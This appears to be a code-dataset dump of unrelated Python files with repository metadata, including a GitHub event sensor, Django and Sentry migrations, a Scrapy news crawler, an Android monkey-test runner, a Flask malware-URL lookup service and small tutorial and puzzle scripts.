setattr(EnableRemoteApi, app_id, True)
| [
"[email protected]"
] | |
117c969597f63a06bb56b3e40e60ba582e8ba33d | e1f87c26f973bd31da1f53dfef37ff4a8c7fd0b6 | /packs/github/sensors/github_repository_sensor.py | 80f7b909a2eb52584b114f38e3945c6d1560e86d | [
"Apache-2.0"
] | permissive | meirwah/st2contrib | 4470028cf467dfe33ccebe2ebb224c79edc6642e | 0743c96abc04ccda983303c4bdb744929dc17fd2 | refs/heads/master | 2021-01-22T02:13:20.290982 | 2015-08-30T11:39:03 | 2015-08-30T11:39:03 | 38,318,169 | 1 | 2 | null | 2015-06-30T15:45:15 | 2015-06-30T15:45:15 | null | UTF-8 | Python | false | false | 5,136 | py | import eventlet
from github import Github
from st2reactor.sensor.base import PollingSensor
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
DATE_FORMAT_STRING = '%Y-%m-%d %H:%M:%S'
class GithubRepositorySensor(PollingSensor):
EVENT_TYPE_WHITELIST = [
'IssuesEvent', # Triggered when an issue is assigned, unassigned, labeled, unlabeled,
# opened, closed, or reopened
'IssueCommentEvent', # Triggered when an issue comment is created
'ForkEvent', # Triggered when a user forks a repository,
'WatchEvent' # Triggered when a user stars a repository
]
def __init__(self, sensor_service, config=None, poll_interval=None):
super(GithubRepositorySensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._trigger_ref = 'github.repository_event'
self._logger = self._sensor_service.get_logger(__name__)
self._client = None
self._repositories = []
self._last_event_ids = {}
def setup(self):
self._client = Github(self._config['token'])
for repository_dict in self._config['repository_sensor']['repositories']:
user = self._client.get_user(repository_dict['user'])
repository = user.get_repo(repository_dict['name'])
self._repositories.append((repository_dict['name'], repository))
def poll(self):
for repository_name, repository_obj in self._repositories:
self._logger.debug('Processing repository "%s"' %
(repository_name))
self._process_repository(name=repository_name,
repository=repository_obj)
def _process_repository(self, name, repository):
"""
Retrieve events for the provided repository and dispatch triggers for
new events.
:param name: Repository name.
:type name: ``str``
:param repository: Repository object.
:type repository: :class:`Repository`
"""
assert(isinstance(name, basestring))
count = self._config['repository_sensor']['count']
events = repository.get_events()[:count]
events = list(reversed(list(events)))
last_event_id = self._get_last_id(name=name)
for event in events:
if last_event_id and int(event.id) <= int(last_event_id):
# This event has already been processed
continue
self._handle_event(repository=name, event=event)
if events:
self._set_last_id(name=name, last_id=events[-1].id)
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _get_last_id(self, name):
"""
:param name: Repository name.
:type name: ``str``
"""
if not self._last_event_ids.get(name, None) and hasattr(self._sensor_service, 'get_value'):
key_name = 'last_id.%s' % (name)
self._last_event_ids[name] = self._sensor_service.get_value(name=key_name)
return self._last_event_ids.get(name, None)
def _set_last_id(self, name, last_id):
"""
:param name: Repository name.
:type name: ``str``
"""
self._last_event_ids[name] = last_id
if hasattr(self._sensor_service, 'set_value'):
key_name = 'last_id.%s' % (name)
self._sensor_service.set_value(name=key_name, value=last_id)
def _handle_event(self, repository, event):
if event.type not in self.EVENT_TYPE_WHITELIST:
self._logger.debug('Skipping ignored event (type=%s)' % (event.type))
return
self._dispatch_trigger_for_event(repository=repository, event=event)
def _dispatch_trigger_for_event(self, repository, event):
trigger = self._trigger_ref
created_at = event.created_at
if created_at:
created_at = created_at.strftime(DATE_FORMAT_STRING)
# Common attributes
payload = {
'repository': repository,
'id': event.id,
'created_at': created_at,
'type': event.type,
'actor': {
'id': event.actor.id,
'login': event.actor.login,
'name': event.actor.name,
'email': event.actor.email,
                'location': event.actor.location,
'bio': event.actor.bio,
'url': event.actor.html_url
},
'payload': {}
}
event_specific_payload = self._get_payload_for_event(event=event)
payload['payload'] = event_specific_payload
self._sensor_service.dispatch(trigger=trigger, payload=payload)
def _get_payload_for_event(self, event):
payload = event.payload or {}
return payload
| [
"[email protected]"
] | |
0cb32b495378935ca0dc58cd114e1c9f37142914 | 0c14e45bd96dcbdd344e038705822ffce90aba4e | /application.py | 3bdd304a07cf828f4ba8632fc5a73c5751c60864 | [] | no_license | qiwsir/json-diff | 624b18833832edaab62180a1bdf0c10c19f9fefc | bb5ae3798fcf24c0e3d20ba7cb6bd63dce217620 | refs/heads/master | 2021-01-16T21:08:39.725121 | 2014-11-13T15:25:11 | 2014-11-13T15:25:11 | 26,757,081 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,526 | py | #! /usr/bin/env python
#coding:utf-8
from method import diffmethod
from dboption.mongodb import *
import json
import datetime
import time
import json_tools
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
def diff():
"""
find the difference between the two JSONs.
"""
gene_last = [ ele["_id"] for ele in lastdb.find({},{'_id':1}) ]
gene_new = [ ele["_id"] for ele in newdb.find({},{'_id':1}) ]
geneid = diffmethod.OptLst(gene_last, gene_new)
add_gene = geneid.addLst() #the list consisting of the IDs in the new collection different from the IDs in the old one
shared_gene = geneid.shareLst() #the list consisting of the IDs in the new collection same as the IDs in the old one
deleted_gene = geneid.deleLst() #the list consisting of the IDs in the old collection but not in the new collection
#insert the new values into the database.
if add_gene:
for i in add_gene:
one_gene = newdb.find_one({"_id":i})
db_change.insert({"gene_id":i,"changes":[{"stat":"new_gene","value":one_gene}],"lastdb":last_date,"newdb":new_date})
#store the deleted IDs
if deleted_gene:
for i in deleted_gene:
one_gene = lastdb.find_one({"_id":i})
db_change.insert({"gene_id":i,"changes":[{"stat":"delete"}],"lastdb":last_date,"newdb":new_date})
#store the records in which the values have been changed
if shared_gene:
diff_gene = [i for i in shared_gene if cmp(lastdb.find_one({"_id":i},{"_id":0}),newdb.find_one({"_id":i},{"_id":0}))] #the list of the IDs of the changed records
print "diff_gene_list:",len(diff_gene)
if diff_gene:
for i in diff_gene:
last_content = lastdb.find_one({"_id":i},{"_id":0})
new_content = newdb.find_one({"_id":i},{"_id":0})
diff = diffmethod.DiffJson(last_content, new_content)
diff_lst = diff.diffDict()
changes_value = diff.changesValue(diff_lst)
db_change.insert({"gene_id":i, "changes":changes_value, "lastdb":last_date, "newdb":new_date })
def main():
print ">>>Hi, I am Qiwei. Welcome to my website: www.itdiffer.com<<<"
print "I am working like a horse. You may have a rest and I will send you the result after a while."
diff()
print "ok."
if __name__=="__main__":
start = time.clock()
main()
print "The time I have spent is:"
print (time.clock() - start)
| [
"[email protected]"
] | |
22cce749bf9d8f333797bf9494f8885489e03119 | fa89836a6759151896a07650747462b8cda40610 | /mse/mapdata/migrations/0008_auto_20180223_2200.py | b0b78b056bec3467aec86819cb31761fc5f1df5d | [] | no_license | DigitalGizmo/mse21 | 334813bfebec9b78f0541744e54f218f9cc6936b | 89f1c0f9c05cefaaa8c703732ee4e4642aecd3c9 | refs/heads/master | 2023-07-09T13:29:13.903900 | 2018-03-26T19:26:09 | 2018-03-26T19:26:09 | 126,878,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-02-24 03:00
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0007_auto_20180223_2119'),
]
operations = [
migrations.AlterField(
model_name='voyage',
name='lat_sec',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='voyage',
name='lon_sec',
field=models.FloatField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
c51f89c655b8803a2b1d658b3ed1d38be188103a | 67f988dedfd8ae049d982d1a8213bb83233d90de | /external/chromium/build/android/run_monkey_test.py | 433b2bdd5f81c748e3497f34f25e25487ffdb2b1 | [
"BSD-3-Clause"
] | permissive | opensourceyouthprogramming/h5vcc | 94a668a9384cc3096a365396b5e4d1d3e02aacc4 | d55d074539ba4555e69e9b9a41e5deb9b9d26c5b | refs/heads/master | 2020-04-20T04:57:47.419922 | 2019-02-12T00:56:14 | 2019-02-12T00:56:14 | 168,643,719 | 1 | 1 | null | 2019-02-12T00:49:49 | 2019-02-01T04:47:32 | C++ | UTF-8 | Python | false | false | 5,697 | py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs the Monkey tests on one or more devices."""
import logging
import optparse
import random
import sys
import time
from pylib import android_commands
from pylib import python_test_base
from pylib import python_test_sharder
from pylib import test_options_parser
from pylib import test_result
class MonkeyTest(python_test_base.PythonTestBase):
def testMonkey(self):
start_ms = int(time.time()) * 1000
# Launch and wait for Chrome to launch.
self.adb.StartActivity(self.options.package_name,
self.options.activity_name,
wait_for_completion=True,
action='android.intent.action.MAIN',
force_stop=True)
# Chrome crashes are not always caught by Monkey test runner.
# Verify Chrome has the same PID before and after the test.
before_pids = self.adb.ExtractPid(self.options.package_name)
# Run the test.
output = ''
duration_ms = 0
if before_pids:
output = '\n'.join(self._LaunchMonkeyTest())
duration_ms = int(time.time()) * 1000 - start_ms
after_pids = self.adb.ExtractPid(self.options.package_name)
crashed = (not before_pids or not after_pids
or after_pids[0] != before_pids[0])
result = test_result.SingleTestResult(self.qualified_name, start_ms,
duration_ms, log=output)
results = test_result.TestResults()
if 'Monkey finished' in output and not crashed:
results.ok = [result]
else:
results.crashed = [result]
return results
def _LaunchMonkeyTest(self):
"""Runs monkey test for a given package.
Looks at the following parameters in the options object provided
in class initializer:
package_name: Allowed package.
category: A list of allowed categories.
throttle: Delay between events (ms).
      seed: Seed value for pseudo-random generator. Same seed value
generates the same sequence of events. Seed is randomized by
default.
event_count: Number of events to generate.
verbosity: Verbosity level [0-3].
extra_args: A string of other args to pass to the command verbatim.
"""
category = self.options.category or []
seed = self.options.seed or random.randint(1, 100)
throttle = self.options.throttle or 100
event_count = self.options.event_count or 10000
verbosity = self.options.verbosity or 1
extra_args = self.options.extra_args or ''
timeout_ms = event_count * throttle * 1.5
cmd = ['monkey',
'-p %s' % self.options.package_name,
' '.join(['-c %s' % c for c in category]),
'--throttle %d' % throttle,
'-s %d' % seed,
'-v ' * verbosity,
'--monitor-native-crashes',
'--kill-process-after-error',
extra_args,
'%d' % event_count]
return self.adb.RunShellCommand(' '.join(cmd), timeout_time=timeout_ms)
def DispatchPythonTests(options):
"""Dispatches the Monkey tests, sharding it if there multiple devices."""
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
available_tests = [MonkeyTest('testMonkey')]
attached_devices = android_commands.GetAttachedDevices()
if not attached_devices:
raise Exception('You have no devices attached or visible!')
# Actually run the tests.
logging.debug('Running monkey tests.')
available_tests *= len(attached_devices)
options.ensure_value('shard_retries', 1)
sharder = python_test_sharder.PythonTestSharder(
attached_devices, available_tests, options)
result = sharder.RunShardedTests()
result.LogFull('Monkey', 'Monkey', options.build_type, available_tests)
result.PrintAnnotation()
def main():
desc = 'Run the Monkey tests on 1 or more devices.'
parser = optparse.OptionParser(description=desc)
test_options_parser.AddBuildTypeOption(parser)
parser.add_option('--package-name', help='Allowed package.')
parser.add_option('--activity-name',
default='com.google.android.apps.chrome.Main',
help='Name of the activity to start [default: %default].')
parser.add_option('--category',
help='A list of allowed categories [default: ""].')
parser.add_option('--throttle', default=100, type='int',
help='Delay between events (ms) [default: %default]. ')
parser.add_option('--seed', type='int',
                    help=('Seed value for pseudo-random generator. Same seed '
'value generates the same sequence of events. Seed '
'is randomized by default.'))
parser.add_option('--event-count', default=10000, type='int',
help='Number of events to generate [default: %default].')
parser.add_option('--verbosity', default=1, type='int',
help='Verbosity level [0-3] [default: %default].')
parser.add_option('--extra-args', default='',
help=('String of other args to pass to the command verbatim'
' [default: "%default"].'))
(options, args) = parser.parse_args()
if args:
parser.print_help(sys.stderr)
parser.error('Unknown arguments: %s' % args)
if not options.package_name:
parser.print_help(sys.stderr)
parser.error('Missing package name')
if options.category:
options.category = options.category.split(',')
DispatchPythonTests(options)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
d77e14f58ee39af8660b99b10fb1fe3800ec8f01 | 1d7a40fde9c4da1cdb70f7e641a7dd65a8eba1a8 | /scripts/data/__init__.py | bfae36d4a18366f86026d2c4834e343a27d94655 | [
"BSD-3-Clause"
] | permissive | dezede/dezede | 675c5f6c05beffa5ad855ab521c19c077a188039 | f50d2d478b473ac2acce1c5f6f9748c6211d593c | refs/heads/master | 2023-08-25T13:26:47.939378 | 2023-08-14T20:24:51 | 2023-08-14T20:25:02 | 9,086,660 | 18 | 6 | BSD-3-Clause | 2023-06-05T16:32:57 | 2013-03-28T21:22:39 | Python | UTF-8 | Python | false | false | 20 | py |
data_modules = [
]
| [
"[email protected]"
] | |
fd6ab081d187f04abb302d2404e52c16f876fa11 | 048cda95057e9852b7f1cebbab864ea10e3fc0db | /crawler/v1/yehey.py | d8db31fceb0c5421bbcdb9b8fa70b42b9a447127 | [] | no_license | AMAtreus/dg_crawler_website | fa9e587cf07549c0752bb88a8f61b1057496da26 | 1bcb03a48aff1ebca4e04a5c060be299ca9881d4 | refs/heads/master | 2023-08-17T09:56:51.379743 | 2021-10-13T13:50:23 | 2021-10-13T13:50:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,540 | py | from crawler.spiders import BaseSpider
import requests
# 此文件包含的头文件不要修改
import scrapy
from utils.util_old import *
from crawler.items import *
from bs4 import BeautifulSoup
from scrapy.http import Request, Response
import re
import time
import json
class yehey(BaseSpider):# cyl
name = 'yehey'
# allowed_domains = ['https://yehey.com/']
start_urls = ['https://yehey.com/']
    website_id = 1225 # website id (required)
    language_id = 1866 # id of the language used
    sql = { # SQL configuration
'host': '192.168.235.162',
'user': 'dg_admin',
'password': 'dg_admin',
'db': 'dg_crawler'
}
def parse(self, response):
meta = {}
meta['category2'] = ''
meta['url_cat'] = ''
meta['page_number'] = ''
html = BeautifulSoup(response.text, "html.parser")
cat1 = html.select_one("li#menu-item-5581 a").text
        meta['category1'] = cat1 # get the first-level category
cat1_url = html.select_one("li#menu-item-5581 a")['href']
yield scrapy.Request(cat1_url, meta=meta, callback=self.parse_category2)
def parse_category2(self, response):
html = BeautifulSoup(response.text, "html.parser")
cat2s = html.select("li#menu-item-5581>ul.sub-menu>li")
for c in cat2s:
cat2_url = c.select_one("a")['href']
cat2 = c.select_one("a").text
            response.meta['category2'] = cat2 # get the second-level category
yield scrapy.Request(cat2_url, meta=response.meta, callback=self.parse_category3)
def parse_category3(self, response):
html = BeautifulSoup(response.text, "html.parser")
detail_list = html.select("main#main>article")
for d in detail_list:
            detail_url = d.select_one("h2.entry-title.th-text-md.th-mb-0 a")['href'] # get statically loaded URLs
            yield scrapy.Request(detail_url, meta=response.meta, callback=self.parse_detail) # handle the static data
url = response.url
ex2 = '.*?category/(.*?)/'
url_cat = re.findall(ex2, url, re.S)[0]
response.meta['url_cat'] = url_cat
page_number = 3
response.meta['page_number'] = page_number
request_url = 'https://yehey.com/?infinity=scrolling'
page_text = response.text
ex = '<script type="text/javascript">.*?currentday%22%3A%22(.*?)%22%2C%22'
currentday = re.findall(ex, page_text, re.S)[0]
data = {
'page': '2',
'currentday': currentday,
'query_args[category_name]': url_cat
}
yield scrapy.FormRequest.from_response(response, url=request_url, formdata=data, method='POST',
meta=response.meta, callback=self.parse_category4)
def parse_category4(self, response):
request_url = 'https://yehey.com/?infinity=scrolling'
url_cat = response.meta['url_cat']
page_number = response.meta['page_number']
dic = {'type': 'empty'}
if json.loads(response.body) == dic:
pass
else:
if 'currentday' in json.loads(response.body).keys():
currentday = json.loads(response.body)['currentday']
data = {
'page': str(page_number),
'currentday': currentday,
'query_args[category_name]': url_cat
}
if 'postflair' in json.loads(response.body).keys():
details = json.loads(response.body)['postflair'].keys()
for i in details:
yield scrapy.Request(i, meta=response.meta, callback=self.parse_detail)
if 'html' in json.loads(response.body).keys():
html = json.loads(response.body)['html']
html = BeautifulSoup(html, "html.parser")
ddl = html.select("article time")[0]['datetime']
ddl = re.split('T|\+', ddl) # ['2021-01-30', '23:00:00', '08:00']
ddl = ddl[0] + ' ' + ddl[1] # 2021-01-30 23:00:00
ddl = Util.format_time3(ddl)
else:
ddl = None
if (self.time == None or ddl >= int(self.time)):
response.meta['page_number'] = response.meta['page_number'] + 1
yield scrapy.FormRequest(url=request_url, formdata=data, method='POST',
meta=response.meta, callback=self.parse_category4)
else:
                    self.logger.info('time cutoff reached')
pass
def parse_detail(self,response):
item = NewsItem()
html = BeautifulSoup(response.text, 'html.parser')
item['category1'] = response.meta['category1']
item['category2'] = response.meta['category2']
        if html.find('h1', class_='entry-title th-mb-0 sm:th-text-8xl th-text-4xl').text.strip(): # get the title
item['title'] = html.find('h1', class_='entry-title th-mb-0 sm:th-text-8xl th-text-4xl').text.strip()
        item['body'] = '' # get the body text
if html.select("div.entry-content.th-content p"):
bodies = html.select("div.entry-content.th-content p")
            item['abstract'] = bodies[0].text # get the abstract
# for b in bodies:
# item['body'] += b.text.strip()
# item['body'] += "\n"
b_list = [b.text.strip() for b in bodies]
item['body'] = '\n'.join(b_list)
        item['images'] = [] # get image links
if html.select_one("header#primary-header img") is not None: # 获取单独在标题的图片
image_one = html.select_one("header#primary-header img")['src']
item['images'].append(image_one)
if html.select("div.entry-content.th-content a>img"): # 获取在段落中的图片
imgaes = html.select("div.entry-content.th-content a>img")
for i in imgaes:
item['images'].append(i['src'])
if html.select_one("time.entry-date.published") is not None: # 获取发布时间
pub = html.select_one("time.entry-date.published")['datetime']
pub_time = re.split('T|\+', pub) # datetime="2021-01-30T23:00:00+08:00"
pubtime = pub_time[0] + ' ' + pub_time[1] # ['2021-01-30', '23:00:00', '08:00']
item['pub_time'] = pubtime # 2021-01-30 23:00:00
yield item | [
"[email protected]"
] | |
71b991b29176ceeb40dd18fb108913132eac9b9c | de3b77cb0927f28cbd85e9142c2dfd7c8be7c27e | /tests/migrations/028_log_mod_onboarding_msgs_up.py | 2d6e3dc23a0f321e5d54cd071e2830380b16a154 | [
"MIT"
] | permissive | LoansBot/database | f3dcbccde59fdb80c876d2612f250662946588e6 | eeaed26c2dcfdf0f9637b47ebe15cd1e000d8cc4 | refs/heads/master | 2021-07-02T22:07:18.683278 | 2021-06-02T04:09:38 | 2021-06-02T04:09:38 | 239,400,935 | 0 | 1 | MIT | 2021-06-02T04:14:31 | 2020-02-10T01:06:53 | Python | UTF-8 | Python | false | false | 850 | py | import unittest
import helper
class UpTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.connection = helper.setup_connection()
cls.cursor = cls.connection.cursor()
@classmethod
def tearDownClass(cls):
cls.cursor.close()
cls.connection.rollback()
helper.teardown_connection(cls.connection)
def tearDown(self):
self.connection.rollback()
def test_mod_onboarding_msg_history_exists(self):
self.assertTrue(
helper.check_if_table_exist(self.cursor, 'mod_onboarding_msg_history')
)
def test_mod_onboarding_msg_history_has_pkey(self):
self.assertTrue(
helper.check_if_pkey_exists(self.cursor, 'mod_onboarding_msg_history')
)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
61459c90cd48b2ee3302ca8357924844cce4aef0 | 7fc26de436ad958fc02e11fc7f7486f9ac775d0b | /services/url_lookup/project/api/url.py | 533675f407a56387237c088a49ac2be9f518316b | [] | no_license | chenjienan/url_lookup_service | 633071d78598b2ee248b6a6fc3ceee2bf4ccca9b | ef10d58450af97221697ac0fa26cfb9e5a43415e | refs/heads/master | 2023-05-12T00:09:36.278356 | 2019-08-06T16:45:05 | 2019-08-06T16:45:05 | 199,910,038 | 0 | 0 | null | 2023-05-01T21:14:08 | 2019-07-31T18:36:20 | Python | UTF-8 | Python | false | false | 2,698 | py | from flask import Blueprint, request, jsonify
from flask_restful import Resource, Api
from sqlalchemy import exc
from project import db
from project.api.models import Url
from urllib.parse import unquote
import tldextract
url_blueprint = Blueprint('url', __name__)
api = Api(url_blueprint)
class UrlList(Resource):
def get(self):
""" Get all urls """
response_obj = {
'status': 'success',
'data': {
'urls': [url.to_json() for url in Url.query.all()]
}
}
return response_obj, 200
def post(self):
""" add url to the system """
post_data = request.get_json()
response_object = {
'status': 'fail',
'message': 'Invalid payload.'
}
if not post_data:
return response_object, 400
url = post_data.get('url')
try:
get_url = Url.query.filter_by(url=url).first()
if not get_url:
db.session.add(Url(url=url))
db.session.commit()
response_object['status'] = 'success'
response_object['message'] = f'{url} was added!'
return response_object, 201
else:
response_object['message'] = 'That url already exists.'
return response_object, 400
except exc.IntegrityError:
db.session.rollback()
return response_object, 400
class UrlInfo(Resource):
def get(self, input_url=None):
""" Get url details """
url = unquote(input_url)
# post-process for domain/host extraction
ext = tldextract.extract(url)
host = '.'.join(part for part in ext if part)
response_obj = {
'status': 'fail',
'url': input_url,
'host': host,
'isMalware': None
}
try:
cur_url = Url.query.filter_by(url=host).first()
response_obj['status'] = 'success'
if not cur_url:
response_obj['isMalware'] = 'false'
return response_obj, 200
elif cur_url and not cur_url.active:
response_obj['isMalware'] = 'false'
return response_obj, 200
response_obj['isMalware'] = 'true'
return response_obj, 200
except ValueError:
return response_obj, 404
class UrlPing(Resource):
def get(self):
return {
'status': 'success',
'message': 'pong!'
}
api.add_resource(UrlPing, '/ping')
api.add_resource(UrlList, '/urls')
api.add_resource(UrlInfo, '/urlinfo/<path:input_url>')
| [
"[email protected]"
] | |
079e09457902766095c8d29b7e0de221c64610d5 | 48661992ea5d378437aa245bc2469d9677678fbc | /changecsv.py | d358fb5cd0d7309fed5ab796bf09c38300e23a08 | [] | no_license | sakurasakura1996/kaggle | a4f259ff0a89395d0801cfcd1215d2794598dcce | d159ccaebcc4fcd3013f746d6f280b4914ad9945 | refs/heads/master | 2020-09-11T22:51:34.604108 | 2019-12-08T06:51:45 | 2019-12-08T06:51:45 | 222,216,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | # 修改一下sub.csv的输出 输出序号从1开始,然后label是整数
import csv
import numpy as np
train_data = []
openfile = open('./sub.csv', 'r')
read = csv.reader(openfile)
for line in read:
train_data.append(line)
# print(line)
train_data = np.array(train_data) | [
"[email protected]"
] | |
7acf6789b67228e00bf1be4e74c42b43dcefa3e8 | a9a10382236404d65cd7909adf12bf41b6a59085 | /django_and_full_stack/multi_madlib/web_madlib/web_madlib/views.py | de5b1f7511c5e47a2d346ade9d3fcb4dd9a746ed | [] | no_license | shedwyn/codeguild | 9718038613d082b3a21f2b4ba56cf6cbb282606a | db792b1a13b32d6b135398b21f6a5124a75c639b | refs/heads/master | 2020-04-06T14:36:03.617029 | 2016-09-20T19:48:38 | 2016-09-20T19:48:38 | 55,080,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,006 | py | """
Python Coding Bootcamp (pdxcodeguild)
Code File for web_madlib/views.py
by: Erin Fough and Matthew James K on 5/9/2016
"""
from django.http import HttpResponse
def get_httpresponse_to_request(request=[], sentence=''):
"""
    This function accepts the extracted request parameters and the madlib sentence, and gives back the HttpResponse.
    :param request: list of the incoming request's query-parameter values from the client
    :param sentence: the main body of the madlib string, as a String
    :returns: the HttpResponse for each of the numbered madlib urls.
"""
response_positive = "200 OK"
response_negative = "400 BAD REQUEST "
    if request[0] is None or request[0] == '':
response = HttpResponse(status = 400)
response.write(response_negative + 'noun1 was not provided or blank')
return response
    elif request[1] is None or request[1] == '':
response = HttpResponse(status = 400)
response.write(response_negative + 'noun2 was not provided or blank')
return response
    elif request[2] is None or request[2] == '':
response = HttpResponse(status = 400)
response.write(response_negative + 'noun3 was not provided or blank')
return response
else:
response = HttpResponse(status = 200)
response.write(response_positive + ' ' + sentence)
return response
def render_madlib_1(request):
post_parameters = []
post_parameters.append(request.GET['noun1'] if 'noun1' in request.GET else None) #The key value must be accessible
post_parameters.append(request.GET['noun2'] if 'noun2' in request.GET else None) #If the in expression does not work, use request.GET.get() then check for None
post_parameters.append(request.GET['noun3'] if 'noun3' in request.GET else None)
sentence = "{} hugged {} but not {}".format(post_parameters[0], post_parameters[1], post_parameters[2])
return get_httpresponse_to_request(post_parameters, sentence)
def render_madlib_2(request):
post_parameters = []
post_parameters.append(request.GET['noun1'] if 'noun1' in request.GET else None)
post_parameters.append(request.GET['noun2'] if 'noun2' in request.GET else None)
post_parameters.append(request.GET['noun3'] if 'noun3' in request.GET else None)
sentence = "{} troubled {} but not {}".format(post_parameters[0], post_parameters[1], post_parameters[2])
return get_httpresponse_to_request(post_parameters, sentence)
def render_madlib_3(request):
post_parameters = []
post_parameters.append(request.GET['noun1'] if 'noun1' in request.GET else None)
post_parameters.append(request.GET['noun2'] if 'noun2' in request.GET else None)
post_parameters.append(request.GET['noun3'] if 'noun3' in request.GET else None)
sentence = "{} ran for {} but not {}".format(post_parameters[0], post_parameters[1], post_parameters[2])
return get_httpresponse_to_request(post_parameters, sentence)
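# The three views above differ only in the verb, so a parameterized helper
# (an illustrative refactor, not part of the original file) could replace them:
def _render_madlib(request, verb):
    nouns = [request.GET.get('noun%d' % i) for i in (1, 2, 3)]
    sentence = "{} {} {} but not {}".format(nouns[0], verb, nouns[1], nouns[2])
    return get_httpresponse_to_request(nouns, sentence)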
| [
"[email protected]"
] | |
5ef24cba12de0d3932574c98055682b47fb59215 | faca44e8424959ecd04098ccf936e6f5f80c8465 | /lessons/103-datetime.py | d4e481bf984cf1eaf889fa304cda67ee528e858a | [] | no_license | craymaru/python_practice | 01b0153631d83b2566e31a54346110f632412703 | 7616cbb945f432aa80d43408631b59afb90bf0f5 | refs/heads/master | 2021-05-20T10:12:07.245941 | 2020-05-19T14:33:14 | 2020-05-19T14:33:14 | 252,242,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | import datetime
print("datetime:")
now = datetime.datetime.now()
print(now)
print(now.isoformat())
print(now.strftime("%d/%m/%y-%H%M%S%f"))
today = datetime.date.today()
print(today)
print(today.isoformat())
print(today.strftime("%d/%m/%y"))
t = datetime.time(hour=1, minute=10, second=5, microsecond=100)
print(t)
print(t.isoformat())
print(t.strftime("%H_%M_%S_%f"))
print(now)
# d = datetime.timedelta(weeks=1)
d = datetime.timedelta(days=365)
# d = datetime.timedelta(hours=1)
# d = datetime.timedelta(minutes=1)
# d = datetime.timedelta(seconds=1)
# d = datetime.timedelta(microseconds=1)
print(now - d)
import time
print("time:")
time.sleep(1)
print(time.time())
import os
import shutil
file_name = "test.txt"
if os.path.exists(file_name):
shutil.copy(file_name, "{}.{}".format(
file_name, now.strftime("%Y_%m_%d_%H_%M_%S")
))
with open(file_name, "w") as f:
    f.write("test")
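# Round-trip sketch (not in the original): strptime() parses the same format
# strings that strftime() writes, so a timestamped backup suffix can be
# decoded back into a datetime object.
backup_stamp = now.strftime("%Y_%m_%d_%H_%M_%S")
parsed = datetime.datetime.strptime(backup_stamp, "%Y_%m_%d_%H_%M_%S")
print(parsed)
| [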
"[email protected]"
] | |
3f0729620abccdeb6d4a9f3848fc18bcc0de6521 | 0103046cd77e9f86ccde477736de36bba766ceb6 | /src/sentry/migrations/0143_add_alerts_integrationfeature.py | 8ebf10baaca631b26cd1f6b68dae5ac7c842b3e8 | [
"BUSL-1.1",
"Apache-2.0"
] | permissive | kaozdl/sentry | ad41ada649a20300e9f2fe69050200cfbf738a63 | 63d698f5294f64a8c206b4c741e2a11be1f9a9be | refs/heads/master | 2021-06-21T18:24:21.713064 | 2021-03-04T19:45:20 | 2021-03-04T19:45:20 | 198,681,569 | 0 | 0 | BSD-3-Clause | 2019-07-24T17:32:29 | 2019-07-24T17:32:28 | null | UTF-8 | Python | false | false | 2,008 | py | # Generated by Django 1.11.29 on 2020-12-10 23:55
from django.db import migrations
import sentry.db.models.fields.bounded
class Migration(migrations.Migration):
# This flag is used to mark that a migration shouldn't be automatically run in
# production. We set this to True for operations that we think are risky and want
# someone from ops to run manually and monitor.
# General advice is that if in doubt, mark your migration as `is_dangerous`.
# Some things you should always mark as dangerous:
# - Large data migrations. Typically we want these to be run manually by ops so that
# they can be monitored. Since data migrations will now hold a transaction open
# this is even more important.
# - Adding columns to highly active tables, even ones that are NULL.
is_dangerous = False
# This flag is used to decide whether to run this migration in a transaction or not.
# By default we prefer to run in a transaction, but for migrations where you want
# to `CREATE INDEX CONCURRENTLY` this needs to be set to False. Typically you'll
# want to create an index concurrently when adding one to an existing table.
atomic = True
dependencies = [
("sentry", "0142_add_dashboard_tombstone"),
]
operations = [
migrations.AlterField(
model_name="integrationfeature",
name="feature",
field=sentry.db.models.fields.bounded.BoundedPositiveIntegerField(
choices=[
(0, "integrations-api"),
(1, "integrations-issue-link"),
(2, "integrations-stacktrace-link"),
(3, "integrations-event-hooks"),
(4, "integrations-project-management"),
(5, "integrations-incident-management"),
(6, "integrations-feature-flag"),
(7, "integrations-alerts"),
],
default=0,
),
),
]
| [
"[email protected]"
] | |
72bd965eb35957d66906599b19f40556c0cd940b | 06e34e2dface0b87fa785cab7e65422a5f20ba18 | /Solutions/1822.Sign of the Product of an Array/python.py | efc08c79677082b17cc8158628db075c809fd996 | [] | no_license | JerryHu1994/LeetCode-Practice | c9841b0ce70451c19c8a429a3898c05b6233e1d4 | b0ce69985c51a9a794397cd98a996fca0e91d7d1 | refs/heads/master | 2022-02-10T04:42:28.033364 | 2022-01-02T04:44:22 | 2022-01-02T04:44:22 | 117,118,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | class Solution:
def arraySign(self, nums: List[int]) -> int:
ans = 1
for n in nums:
if n < 0:
ans *= -1
elif n == 0:
return 0
        return ans
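# Usage sketch (not part of the original solution; the annotation above also
# assumes `from typing import List` at the top of the file):
#   Solution().arraySign([-1, -2, -3, -4, 3, 2, 1])  # -> 1 (four negatives)
#   Solution().arraySign([1, 5, 0, 2, -3])           # -> 0 (any zero wins)
# The sign is tracked without computing the product, so there is no overflow
# concern in fixed-width languages; O(n) time, O(1) space.
| [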
"[email protected]"
] | |
